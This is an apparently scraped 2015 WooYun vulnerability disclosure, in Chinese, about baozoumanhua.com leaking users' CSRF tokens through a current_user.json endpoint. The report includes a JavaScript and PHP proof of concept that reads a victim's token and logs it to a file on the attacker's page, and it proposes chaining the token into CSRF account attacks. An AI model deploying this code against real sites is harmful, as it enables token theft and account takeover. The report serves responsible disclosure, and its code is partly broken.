暴走漫画设计缺陷可获取他人token导致可继续进行Csrf攻击(附poc)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095501

漏洞标题：暴走漫画设计缺陷可获取他人token导致可继续进行Csrf攻击(附poc)

漏洞作者：浅蓝

提交时间：2015-02-04 17:13

修复时间：2015-02-09 17:14

公开时间：2015-02-09 17:14

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-04：细节已通知厂商并且等待厂商处理中
2015-02-09：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我是暴走漫画的菊花守护者

详细说明：

http://baozoumanhua.com/current_user.json
http://baozou.com/current_user.json

打开后会显示一些用户的信息，其中有

csrf_token:"+ZEJOyFjEVBwx*****Hn5LyDUVqRjLqW/dF+o=

只要获取到别人的token 就可以继续进行csrf攻击
本码盲渣渣拼凑了一个可以实现该功能的code

x.php

<script type="text/javascript">
//用于创建XMLHttpRequest对象
function createXmlHttp() {
//根据window.XMLHttpRequest对象是否存在使用不同的创建方式
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest(); //FireFox、Opera等浏览器支持的创建方式
} else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");//IE浏览器支持的创建方式
}
}
//直接通过XMLHttpRequest对象获取远程网页源代码
//function getSource() {
createXmlHttp(); //创建XMLHttpRequest对象
xmlHttp.onreadystatechange = writeSource; //设置回调函数
xmlHttp.open("GET", "http://baozou.com/current_user.json", true);
xmlHttp.send(null);
}
//将远程网页源代码写入页面文字区域
function writeSource() {
if (xmlHttp.readyState == 4) {
document.getElementById("source").value = xmlHttp.responseText;
}
}
</script>
<form method="POST">
<textarea name="c" rows="10" cols="80" id="source"></textarea><P>
<input type="button" onclick="getSource()" value="SB"><P>
<input type="submit" name="submit" value="先点SB再点我">
<form>
<?php
if($_POST['submit']){
$filename = 'file.htm';
$c=$_POST['c'];
$word = "data:$c <BR>";
echo $c;
$fh = fopen($filename, "a");
fwrite($fh, $word);
fclose($fh);
}
?>

先用js获取到http://baozou.com/current_user.json 的源代码
按钮SB被点击后将源码写入到textarea标签的值
点击按钮2 会将textarea的值写到file.htm

接下来我们就可以根据我之前提交的两个漏洞继续进行csrf攻击
WooYun: 暴漫主站存储xss坐等王尼玛中枪+刷金币等CSRF
WooYun: 暴走漫画#Csrf防御不当可利用此漏洞修改他人绑定邮箱从而重置密码

漏洞证明：

如上

修复方案：

=。= 别把token放到这

版权声明：转载请注明来源浅蓝@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-02-09 17:14

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095501

漏洞标题：暴走漫画设计缺陷可获取他人token导致可继续进行Csrf攻击(附poc)

相关厂商：baozoumanhua.com

漏洞作者：浅蓝

提交时间：2015-02-04 17:13

修复时间：2015-02-09 17:14

公开时间：2015-02-09 17:14

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源浅蓝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095501

漏洞标题：暴走漫画设计缺陷可获取他人token导致可继续进行Csrf攻击(附poc)

相关厂商：baozoumanhua.com

漏洞作者： 浅蓝

提交时间：2015-02-04 17:13

修复时间：2015-02-09 17:14

公开时间：2015-02-09 17:14

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095501"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浅蓝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：浅蓝

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源浅蓝@乌云